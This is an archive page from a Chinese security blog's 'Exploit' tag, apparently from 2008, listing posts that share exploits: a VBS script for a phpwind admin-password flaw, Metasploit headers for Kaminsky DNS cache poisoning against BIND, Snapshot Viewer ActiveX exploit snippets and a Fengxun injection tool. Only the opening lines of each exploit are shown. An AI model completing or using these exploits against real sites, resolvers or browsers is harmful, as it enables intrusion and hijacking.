标签 ‘Exploit’ 下的日志

phpwind任意修改管理员密码漏洞 VBS版利用程序

2008/08/08 13:12 | 鬼仔 | 工具收集 | 消灭0回复

作者:Tr4c3

'phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3
Dim strUrl, strPost, xPost, strGet
Set Args = Wscript.Arguments
If Args.count<>2 Then
Wscript.Echo "Usage: " & Wscript.ScriptName & " http://hi.baidu.com/tr4c3/ 1"
Wscript.Quit
Else
strUrl = Args(0) & "wap/index.php"
阅读全文 »

Tags: , ,

Kaminsky DNS Cache Poisoning Flaw Exploit for Domains

2008/07/24 14:36 | 鬼仔 | 工具收集 | 6 个回复 
                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/

                    Computer Academic Underground
                        http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2008-0003
Release Date:   2008.07.23
Title:          bailiwicked_domain.rb
Description:    Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
Tested:         BIND 9.4.1-9.4.2
Attributes:     Remote, Poison, Resolver, Metasploit
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
Author/Email:   I)ruid <druid (@) caughq.org>
                H D Moore <hdm (@) metasploit.com>
===============/========================================================

阅读全文 »

Tags: ,

BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (meta)

2008/07/24 14:11 | 鬼仔 | 工具收集 | 2 个回复 
                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/

                    Computer Academic Underground
                        http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2008-0002
Release Date:   2008.07.23
Title:          bailiwicked_host.rb
Description:    Kaminsky DNS Cache Poisoning Flaw Exploit
Tested:         BIND 9.4.1-9.4.2
Attributes:     Remote, Poison, Resolver, Metasploit
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
Author/Email:   I)ruid <druid (@) caughq.org>
                H D Moore <hdm (@) metasploit.com>
===============/========================================================

阅读全文 »

Tags: ,

MS Office Snapshot Viewer ActiveX Exploit (可执行版)

2008/07/15 18:23 | 鬼仔 | 工具收集 | 4 个回复

作者:lcx

可执行版,请勿用于非法用途。

<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

阅读全文 »

Tags: ,

Microsoft Office Snapshot Viewer ActiveX Exploit

2008/07/08 19:01 | 鬼仔 | 工具收集 | 消灭0回复

来源:http://hi.baidu.com/cloie/

今天有人发了个Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞

EXP:


<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>

阅读全文 »

Tags: , ,

风讯注入exp(hta版)

2008/07/06 18:36 | 鬼仔 | 工具收集 | 1 个回复

作者:lcx

<SCRIPT LANGUAGE="VBScript">
Sub Window_onLoad
window.resizeTo 450,380
window.moveTo 300, 300
End Sub
</SCRIPT>

阅读全文 »

Tags: , ,